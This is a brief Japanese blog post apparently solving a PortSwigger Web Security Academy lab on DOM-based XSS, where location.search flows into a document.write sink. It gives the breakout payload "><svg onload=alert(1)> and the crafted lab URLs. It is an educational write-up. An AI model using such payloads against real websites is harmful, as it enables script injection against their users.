Shikata Ga Nai

Private? There is no such things.

DOM XSS in document.write sink using source location.searchをやってみた

Hello there, ('ω')ノ

 

ソースlocation.searchを使用したdocument.writeシンクのDOMXSSを。

 

まずは、動作確認を。

ちなみにURLは以下のようになって。

 https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search=test

 

f:id:ThisIsOne:20210224185936p:plain

 

レスポンスボディを見るとスクリプトを介していることがわかって。

 

f:id:ThisIsOne:20210224190333p:plain

下記を入力して、document.write('<img src="~を閉じてスクリプトを実行することに。

 "><svg onload=alert(1)>

 

実行時のURLは、以下のとおりで。

https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search=%22%3E%3Csvg+onload%3Dalert%281%29%3E

 

デコードした結果は、以下のとおりで。

https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search="><svg onload=alert(1)>

 

f:id:ThisIsOne:20210224190527p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210224190647p:plain

 

Best regards, (^^ゞ